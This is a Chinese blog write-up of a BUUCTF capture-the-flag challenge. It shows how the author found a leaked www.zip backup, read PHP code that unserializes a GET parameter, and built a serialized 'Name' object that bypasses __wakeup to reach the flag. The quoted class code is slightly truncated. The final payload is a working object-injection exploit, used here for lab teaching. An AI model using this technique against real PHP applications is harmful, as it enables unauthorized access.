buuctf-web-[极客大挑战 2019]PHP 1

知识点:文件备份、反序列化

打开网站后发现源码没有提示,页面提示“备份的好习惯”,用御剑扫后台,扫出www.zip,打开发现有几个php文件

打开index.php发现关键代码

<?php
    include 'class.php';
    $select = $_GET['select'];
    $res=unserialize(@$select);//反序列化
?>

打开class.php看代码

class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;

读代码可以发现只有当username=admin,password=100时才能得到flag。但我们要绕过wakeup,不然username就会变成guest。

绕过方法:让对象属性的个数的值大于真实的属性个数

构造payload:?select=O:4:"Name":3:{s:14:" Name username";s:5:"admin";s:14:" Name password";i:100;}

发现错误,原来是漏了空格,修改一下就可以得到flag了

?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}


__EOF__

本文作者Dkfor3
本文链接https://www.cnblogs.com/dk2154/p/17017531.html
关于博主:评论和私信会在第一时间回复。或者直接私信我。
版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
声援博主:如果您觉得文章对您有帮助,可以点击文章右下角推荐一下。您的鼓励是博主的最大动力!
posted @   Dk只能爬  阅读(116)  评论(0编辑  收藏  举报
相关博文:
· buuctf-web-[MRCTF2020]Ez_bypass
· [极客大挑战 2019]PHP
· [BUUCTF][WEB][极客大挑战 2019]PHP 1
· [极客大挑战 2019]PHP 1
· [极客大挑战 2019]PHP
阅读排行:
· 阿里最新开源QwQ-32B,效果媲美deepseek-r1满血版,部署成本又又又降低了!
· 开源Multi-agent AI智能体框架aevatar.ai,欢迎大家贡献代码
· Manus重磅发布:全球首款通用AI代理技术深度解析与实战指南
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!
· AI技术革命,工作效率10个最佳AI工具
点击右上角即可分享
微信分享提示
AI IDE Trae